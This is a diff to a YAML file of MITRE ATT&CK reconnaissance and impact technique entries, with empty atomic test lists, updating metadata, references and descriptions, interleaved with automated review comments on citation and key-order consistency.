+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
@@ -112385,7 +113071,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -112401,8 +113087,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -112428,7 +113112,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -112444,8 +113128,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -112473,7 +113155,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -112489,12 +113171,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -112503,16 +113183,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -112525,8 +113205,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -112537,52 +113217,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
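Review bot: T1597 drops `(Citation: D3Secutrity CTI Feeds)` from its description and removes the matching reference entry, while the sub-technique T1597.001 earlier in this patch keeps both the citation in its description and the d3security.com reference entry. Each technique carries its own external_references, so nothing dangles, and the version bump to '1.1' with the added contributor is consistent with an upstream content change; the point to check is that the generator built both techniques from the same bundle, since a parent and child rendered from different releases would look exactly like this.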
@@ -112604,7 +113282,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -112620,8 +113298,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
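Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1592.003 without adding a replacement in the visible context, whereas T1595.003 further down keeps `x_mitre_attack_spec_version: 2.1.0` and only loses `spec_version`; confirm the T1592.003 object still carries `x_mitre_attack_spec_version` elsewhere in its key order rather than losing the field outright. The same two-line removal applies to T1592.002, T1593.001, T1591.004, T1596.005, T1591.001 and T1598.001 below.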
@@ -112647,7 +113323,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -112665,8 +113341,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -112688,7 +113362,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -112704,12 +113378,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -112719,17 +113391,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
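Review bot: the reordered description introduces three new citation keys (`Bleeping Computer 2easy 2021`, `SecureWorks Infostealers 2023`, `Bleeping Computer Stealer Logs 2023`), each of which needs a matching `source_name` under this technique's `external_references`; the later hunks for T1589.001 add all three, and the `x_mitre_version` bump to '1.2' matches a genuine content change rather than a re-serialization. Two things to keep an eye on: the old "other black-markets" sentence is dropped rather than moved, and the literal `\n\n` sequences inside this double-quoted YAML scalar must stay escaped exactly as shown, since the quoted scalar is what turns them into paragraph breaks.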
@@ -112741,6 +113416,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -112751,7 +113427,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -112761,6 +113437,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -112773,6 +113453,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -112795,6 +113479,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -112802,9 +113490,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -112863,7 +113550,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -112883,7 +113570,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
@@ -112905,7 +113591,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -112921,12 +113607,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -112995,7 +113679,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -113043,31 +113727,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -113076,19 +113741,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
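Review bot: the T1595.001 object is re-serialized with its keys in a different order (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted from the top of the object in the previous hunk and re-emitted here after `x_mitre_data_sources`), so the diff reads as a rewrite when the substantive changes are small: `modified` advances to '2024-10-15T13:46:55.039Z', `x_mitre_version` goes from '1.0' to '1.1', a contributor (Diego Sappa, Securonix) and the `'Network Traffic: Network Traffic Content'` data source are added, and `revoked: false` appears. If the generator can emit keys in a stable order, future regenerations will produce reviewable diffs.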
@@ -113146,7 +113833,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -113167,7 +113853,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -113183,8 +113869,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -113210,7 +113894,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -113226,8 +113910,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -113251,7 +113933,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -113273,13 +113955,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -113371,13 +114051,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -113386,7 +114065,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -113403,17 +114081,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
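Review bot: the `x_mitre_platforms` list for T1498.001 loses `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` (keeping Windows, IaaS, Linux, macOS) with `x_mitre_version` moving from '1.3' to '1.4'; because the per-platform index files are derived from this list, they should be regenerated in the same change so the technique disappears from the indexes of the removed platforms. Also note that `x_mitre_modified_by_ref` is removed here and `x_mitre_attack_spec_version: 2.1.0` in the hunk above; both are re-added at the end of the object in the next hunk (the spec version as 3.2.0), so the object is complete only once all hunks apply.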
@@ -113438,7 +114111,8 @@ impact:
